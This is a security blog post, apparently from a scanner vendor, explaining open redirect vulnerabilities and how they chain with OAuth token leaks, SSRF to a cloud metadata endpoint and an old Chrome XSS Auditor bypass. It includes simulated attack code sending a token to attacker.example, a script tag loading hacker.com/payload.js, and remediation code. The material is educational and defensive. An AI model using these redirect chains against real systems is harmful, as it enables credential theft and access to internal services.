Discovering and remediating Open Redirect Vulnerabilities

What is an Open Redirect Vulnerability?

An Open Redirect Vulnerability exists when an application takes a destination URL from user-controlled input (typically a query parameter such as ?next=, ?url= or ?returnTo=) and redirects the browser to it without validating the target. The link appears to point at a trusted site, but that site forwards the visitor to a destination of the attacker's choosing, including one built for malicious purposes. The cybersecurity community tends to rate Open Redirects as low severity because they are most commonly connected to phishing scams and social engineering.

However, Open Redirect Vulnerabilities can help attackers in a whole host of ways that go far beyond phishing. The true risk of this vulnerability appears when it is chained with another weakness: Server-Side Request Forgery (SSRF), a bypass of Chrome's former XSS Auditor, abuse of an OAuth flow, and so on. We will cover these in depth later on in this post.

Different kinds of Open Redirects

For the purposes of this blog, we will focus primarily on Open Redirect vulnerabilities that are header-based and JavaScript-based. A header-based redirect is performed by the browser (or any other HTTP client) on the basis of the response alone, so it works even when JavaScript isn't interpreted; a JavaScript-based redirect only happens when the page's script is actually executed.

Header-Based Open Redirection

First things first, let's talk about Header-based Open Redirection, since it works even when JavaScript doesn't get interpreted. The HTTP Location header is a response header that does one of two things, depending on the status code it accompanies:

– With a 3xx status (301, 302, 303, 307 or 308) it tells the client to redirect to the given URL.
– With a 201 Created status it provides the location of the resource that was just created.

Because the redirect is carried by the response itself, it is JavaScript-independent and is followed by browsers, command-line clients and server-side HTTP libraries alike. When the value of Location is built from an unvalidated request parameter, an attacker can use it to send the targeted user to another website. It's simple but incredibly effective: the link starts with a domain the user trusts, and few users examine the rest of the query string for a suspicious destination.

JavaScript-Based Open Redirection

A JavaScript-based Open Redirection happens on the client side: page script reads a destination from a user-controlled source (a query parameter, the URL fragment, a postMessage payload) and assigns it to window.location, location.href, location.assign() or location.replace(). Because the browser only redirects once the script runs, this kind of redirect has no effect on a server-side HTTP client that merely fetches the page, so it is less useful than a header-based one for chaining with SSRF. For an unsuspecting victim using a normal web browser, however, it is at least as dangerous. Since Open Redirections are mostly seen in phishing scams, people aren't aware that a client-side redirect can also be part of a more complex chain of attacks where multiple vulnerabilities get exploited. One important difference from a Location header is that location.href accepts more than http(s) URLs: redirecting a user to javascript:something() executes that code in the origin of the vulnerable page, which turns the Open Redirect into a DOM-based Cross-Site Scripting injection.

When Open Redirect becomes an issue

As we've mentioned before, most people just assume Open Redirects are always tied to phishing scams and social engineering, and so they underestimate how Open Redirects can be used in conjunction with other attacks.

Let's discuss how an Open Redirect is used to steal users' credentials and tokens. OAuth flows are a favourite target because the victim is asked to sign in to a popular platform like Google, Facebook, Twitter or LinkedIn, and at the end of the flow the provider redirects the browser back to the client application's redirect_uri with the authorization code or access token attached to that URL. If the provider accepts any redirect_uri that merely shares a domain or prefix with the registered one, the attacker can point it at an Open Redirect on the legitimate client application, and the code or token is forwarded to a server the attacker controls. The same primitive supports plain phishing: a link sends the victim to the legitimate website in question (Instagram, for example), the victim enters their login details, and the redirect then lands on a bogus website that is identical to the real one and claims the username or password was incorrect, asking for them again. That's how your information is stolen, and the attacker can then exploit it in many ways. Facebook deals with this by requiring redirect_uri to match a pre-configured URL exactly, and if there is a mismatch the redirection is denied; the OAuth 2.0 Security Best Current Practice calls for the same exact string comparison. Unfortunately, not every provider or self-hosted authorization server enforces an exact match, and partial matching is precisely what this attack relies on.
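The chain described above, as an added example that is not part of the original post: a simulated OAuth 2.0 authorization server (implicit grant, so the token travels in the URL fragment) that checks redirect_uri either loosely or exactly, a client with an Open Redirect at /logout?next=, and the browser behaviour that keeps the fragment across a 302. The hostnames client.example and attacker.example, the endpoint paths and the token value are assumptions for illustration.

```javascript
// Added example, not code from the original post. Models the redirect_uri
// check of an OAuth 2.0 authorization server and shows how a loose check plus
// an open redirect on the client leaks the access token. All hostnames, paths
// and token values below are constructed for the example.

const REGISTERED_REDIRECT_URI = "https://client.example/oauth/callback";

// Loose comparison: any URL on the registered origin passes.
function prefixMatch(registered, requested) {
  return requested.startsWith(new URL(registered).origin + "/");
}

// Strict comparison: the whole registered string must match.
function exactMatch(registered, requested) {
  return registered === requested;
}

// The provider's response to a successful login in the implicit grant:
// the access token rides in the fragment of the Location header.
// Returns the Location value, or null if redirect_uri is rejected.
function authorize(requestedRedirectUri, accessToken, matcher) {
  if (!matcher(REGISTERED_REDIRECT_URI, requestedRedirectUri)) {
    return null; // mismatch: the provider must show an error, never redirect
  }
  const target = new URL(requestedRedirectUri);
  target.hash = "access_token=" + accessToken;
  return target.href;
}

// An open redirect on the client: GET /logout?next=<url> answers 302 with
// Location: <url>. Returns the Location value, or null for other paths.
function clientLogoutHandler(requestUrl) {
  const url = new URL(requestUrl);
  if (url.pathname === "/logout" && url.searchParams.has("next")) {
    return url.searchParams.get("next");
  }
  return null;
}

// Browser behaviour on a redirect: if the Location header carries no
// fragment, the fragment of the current URL is preserved (Fetch standard,
// "HTTP-redirect fetch"). That is what carries the token to the attacker.
function browserFollow(currentUrl, locationHeader) {
  const next = new URL(locationHeader, currentUrl);
  if (!next.hash) next.hash = new URL(currentUrl).hash;
  return next.href;
}

// Runs the whole chain and returns the URL the browser finally lands on,
// or null when the provider refuses the redirect_uri.
function runAttack(matcher) {
  const maliciousRedirectUri =
    "https://client.example/logout?next=https://attacker.example/collect";
  const providerLocation = authorize(maliciousRedirectUri, "tok_secret123", matcher);
  if (providerLocation === null) return null;
  const clientLocation = clientLogoutHandler(providerLocation);
  if (clientLocation === null) return providerLocation;
  return browserFollow(providerLocation, clientLocation);
}

console.log("prefix match :", runAttack(prefixMatch));
console.log("exact match  :", runAttack(exactMatch));
```

With prefixMatch the browser ends up at https://attacker.example/collect#access_token=tok_secret123; with exactMatch the provider never redirects. For the authorization code grant the code sits in the query string rather than the fragment, so the leak depends on the vulnerable endpoint echoing its query, but the fix is the same: exact matching of redirect_uri on the provider side and no open redirects on the client side.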

In addition, we have Server-Side Request Forgery and the Cross-Site Scripting Auditor bypass. SSRF is an attack in which the attacker makes a server issue HTTP requests on their behalf, which makes it easy to reach internal systems that hide behind a firewall or a filter: internal admin interfaces, the cloud instance metadata service, databases with HTTP APIs. Many SSRF defences only validate the hostname of the URL the user supplied and then let the HTTP client follow redirects on its own. An Open Redirect on a trusted, allowed domain is extremely useful for bypassing such a filter: the server fetches the allowed URL, receives a redirect, and follows it into the internal network. By combining an Open Redirect with SSRF, the attacker turns a narrowly filtered fetch into free rein to reach wherever the server can.
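The bypass above, as an added example that is not part of the original post: a simulated server-side fetcher with a hostname allowlist. The naive version checks only the URL the user supplied and then follows Location headers blindly, which is the default behaviour of most HTTP client libraries; the hardened version re-validates every hop. The "network" is a constructed lookup table, and the hostnames, paths and metadata contents are assumptions for illustration.

```javascript
// Added example, not code from the original post. Simulates an SSRF filter
// that is defeated by an open redirect, and the fix. The fake network, the
// hostnames and the metadata content are constructed for the example.

// Constructed "network": exact URL -> response. 302 responses carry a Location.
const FAKE_NETWORK = {
  "https://vulnerable.example/redirect?to=http://169.254.169.254/latest/meta-data/":
    { status: 302, headers: { location: "http://169.254.169.254/latest/meta-data/" } },
  "http://169.254.169.254/latest/meta-data/":
    { status: 200, body: "ami-id\niam/\ninstance-id" },
  "https://vulnerable.example/public.json":
    { status: 200, body: '{"ok":true}' },
};

const ALLOWED_HOSTS = new Set(["vulnerable.example"]);
const MAX_HOPS = 5;

// The SSRF filter: only https URLs on an allowlisted host may be requested.
function isAllowed(urlString) {
  let url;
  try { url = new URL(urlString); } catch { return false; }
  return url.protocol === "https:" && ALLOWED_HOSTS.has(url.hostname);
}

// One request against the fake network. Like an HTTP client configured NOT
// to follow redirects, it hands the 3xx back to the caller.
function fakeRequest(urlString) {
  return FAKE_NETWORK[urlString] || { status: 404, body: "" };
}

// Shared redirect-following loop. `checkEveryHop` decides whether the
// filter runs once (naive) or before every request (hardened).
function fetchWithFilter(userUrl, checkEveryHop) {
  if (!checkEveryHop && !isAllowed(userUrl)) return { blocked: userUrl };
  let current = userUrl;
  for (let hop = 0; hop < MAX_HOPS; hop++) {
    if (checkEveryHop && !isAllowed(current)) return { blocked: current };
    const res = fakeRequest(current);
    if (res.status >= 300 && res.status < 400 && res.headers && res.headers.location) {
      // Resolve relative Locations against the URL that issued them.
      current = new URL(res.headers.location, current).href;
      continue;
    }
    return { finalUrl: current, status: res.status, body: res.body };
  }
  return { error: "too many redirects" };
}

// Naive: validate the user's URL once, then follow redirects anywhere.
function fetchNaive(userUrl) {
  return fetchWithFilter(userUrl, false);
}

// Hardened: validate the resolved target of every hop before requesting it.
function fetchHardened(userUrl) {
  return fetchWithFilter(userUrl, true);
}

const attack =
  "https://vulnerable.example/redirect?to=http://169.254.169.254/latest/meta-data/";
console.log("naive    :", fetchNaive(attack));
console.log("hardened :", fetchHardened(attack));
```

The naive fetcher returns the metadata listing from 169.254.169.254; the hardened one stops at the redirect target and reports it as blocked. In a real implementation, checking every hop is necessary but not sufficient: the filter must also resolve the hostname and reject private, loopback and link-local addresses, or an attacker can reach the same targets with a hostname that resolves internally.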

Then there's the Cross-Site Scripting (XSS) Auditor bypass. Google Chrome used to ship a built-in XSS Auditor that stopped many reflected XSS attacks by looking for request input that was echoed back as script in the response. It did not, however, block a script tag whose src pointed at the same origin as the page, so an Open Redirect on that origin let an attacker load a payload hosted elsewhere while the auditor only ever saw a same-origin URL:

<script src="https://vulnerable.com/path/https/hacker.com/payload.js"></script>

Chrome removed the XSS Auditor in version 78 (2019), so this particular bypass is historical, but the trick is worth remembering wherever a filter or policy trusts a URL because of its origin without considering where that URL redirects.

How to avoid Open Redirect vulnerabilities?

Try to avoid redirects to user-supplied destinations completely if possible, especially ones taken from GET parameters. However, if a redirect based on user input is genuinely needed, these are the solutions:

– Allowlist your trustworthy destinations: prefer a fixed set of relative paths or named targets, and when external destinations are required, compare the parsed origin of the target against a list of allowed origins rather than doing a substring or prefix match.
– Validate the redirect target after parsing it as a URL (scheme, host, userinfo) and reject anything that is not http(s) on an allowed origin. Do not try to "sanitize" a bad value by stripping characters; forms such as //evil.com, /\evil.com and javascript: with embedded whitespace are easy to miss, and rejecting with a fallback to a safe default is simpler and safer.
– Make developers aware that an Open Redirect isn't just used in phishing scams, and that attackers chain it with OAuth flows, SSRF and XSS to exploit other vulnerabilities.
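One way to implement the allowlist and validation steps above, as an added example that is not part of the original post. The same function serves the JavaScript-based redirect discussed earlier (assign its return value to location.href) and the header-based one (put its return value in Location), and it rejects the javascript: form that turns a client-side redirect into XSS. The origin vulnerable.example, the partner allowlist and the default target are assumptions for illustration.

```javascript
// Added example, not code from the original post. A redirect-target
// validator that accepts only same-origin targets or an explicit allowlist
// of external origins and falls back to a safe default for everything else.
// OWN_ORIGIN, the allowlist and DEFAULT_TARGET are assumptions.

const OWN_ORIGIN = "https://vulnerable.example";
const ALLOWED_EXTERNAL_ORIGINS = new Set(["https://partner.example"]);
const DEFAULT_TARGET = "/";

// Returns an absolute URL that is safe to place in a Location header or to
// assign to location.href, or DEFAULT_TARGET when the candidate is rejected.
function safeRedirectTarget(candidate) {
  if (typeof candidate !== "string" || candidate.length === 0 || candidate.length > 2048) {
    return DEFAULT_TARGET;
  }
  // Control characters and whitespace can split headers ("%0d%0a" after
  // decoding) or hide a scheme ("java\tscript:"); reject rather than strip.
  if (/[\u0000-\u001f\u007f\s]/.test(candidate)) return DEFAULT_TARGET;

  let url;
  try {
    // Resolving against our own origin turns "/account" into an absolute URL.
    // It also turns "//evil.example" and "/\evil.example" into
    // https://evil.example/, which is why the decision below is made on the
    // parsed origin and never on the raw string.
    url = new URL(candidate, OWN_ORIGIN);
  } catch {
    return DEFAULT_TARGET;
  }
  // javascript:, data:, vbscript: and similar never get past this check.
  if (url.protocol !== "https:" && url.protocol !== "http:") return DEFAULT_TARGET;
  // Userinfo ("https://vulnerable.example@evil.example") is never legitimate here.
  if (url.username !== "" || url.password !== "") return DEFAULT_TARGET;

  if (url.origin === OWN_ORIGIN || ALLOWED_EXTERNAL_ORIGINS.has(url.origin)) {
    return url.href;
  }
  return DEFAULT_TARGET;
}

// Usage, server side (Express-style call shown as a comment) and client side:
//   res.redirect(302, safeRedirectTarget(req.query.next));
//   location.href = safeRedirectTarget(new URLSearchParams(location.search).get("next"));

const samples = [
  "/account?tab=1",
  "https://partner.example/x",
  "https://evil.example/",
  "//evil.example/",
  "/\\evil.example",
  "javascript:alert(1)",
  "java\tscript:alert(1)",
  "https://vulnerable.example.evil.example/",
  "https://vulnerable.example@evil.example/",
];
for (const s of samples) console.log(JSON.stringify(s), "->", safeRedirectTarget(s));
```

Note that the check is made on url.origin after parsing, so scheme-relative and backslash forms, look-alike hostnames and userinfo tricks all collapse to the same decision, and a default port or mixed-case host still normalises to the allowed origin.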

NexDAST to the rescue

Another way of dealing with Open Redirect vulnerabilities is to find them before an attacker does, using NeuraLegion's NexDAST, a black-box security testing solution that examines your application, APIs or WebSockets and tries to find vulnerabilities. NexDAST is an automated scanner that finds both common and critical security vulnerabilities on its own, without human assistance. It can locate Open Redirects swiftly and send alerts with remediation guidelines to the developers, or automatically open tickets in the company's bug-tracking tool.

If you wish to learn more about our NexDAST solution, we have a blog post that provides additional information and outlines its advantages. Anyone who has read it and decided to try NexDAST can request a demo. If you're interested in our security solutions, you can also check out our LinkedIn page for more content and leave a comment with your thoughts on this post.